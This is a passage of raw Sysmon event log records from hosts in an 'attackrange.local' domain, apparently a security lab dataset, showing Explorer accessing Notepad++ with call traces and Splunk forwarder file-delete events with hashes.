Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001047003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8 10341000x80000000000000001047002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001047001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001047000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001046999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001046998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001046997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.768{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+1746d2|C:\Windows\System32\windows.storage.dll+174ba6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814 10341000x80000000000000001046996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.748{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1747e9|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.748{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+174765|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.748{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f 10341000x80000000000000001046993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.748{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e 23542300x80000000000000001046992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.018{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E0848F2CA901CC15DAA0714D412093A,SHA256=7586283B71723A0C4C1BCC02842F092D3E8300DA5DB95332473AC22E10C89B00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:30.065{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=427D86622804FA503B75EAE58869AE01,SHA256=55B486C5F7AF1C3BC8157F37CFB32C72A6A4B19AB9C4362D7EF0A1EC71A49B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:31.706{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A419902A4AB2FE646D1A9CC702A7F61,SHA256=51056FF7F9142238D1E8A8B1EAB534FC9E154F8C13065566F32F4B84C4B0F633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A3B6D4857B0918510BF38191E1DA5A6,SHA256=B5D090600915E75BB8AB7AD61AFC7E684004C1A76D8A6339E9A1A483BE71D559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=440BC6521921A76AB6E5BFA504FAE61D,SHA256=1F2C17A2B866B9E349DC44BFBDC80CD857CE1CCE387E78EE31D899B366DF0DB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001047050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001047049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4 10341000x80000000000000001047048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f 23542300x8000000000000000806737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:32.737{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C0F977383E93A42DDA789C65A891803,SHA256=4295B59E5BFB024D4F9A1C78FC577BEB54259F9C2EDC756EDDD1AC032F9416EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:32.147{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4B05252222EDD2ED56F111313B1D7AE,SHA256=6641E83CD2B2C31B54DA61215CDD2580E728FFF6F384529AFAEF78E97B017288,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:33.769{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CABA2C1F879540CAD846F2F12442D33,SHA256=0441B90FBBFBFDF94C82CB17C7CA1872390CBBBA3C68DFCD1A6FD5CF1C2CDEBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:33.148{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB64DFCD6DF2634F014B62AA0EEF09C6,SHA256=DDBC8E5EC2E5C5DE5C6AEBB9602EB2156A47BDCAEA1B430DB08267060B92E82C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:34.830{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D388D01E42DC38488206848AC03305C,SHA256=6929DCE688B9A333BE17CC9E47FB8B63A63AECC834B71589CC29CF507D8FB394,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 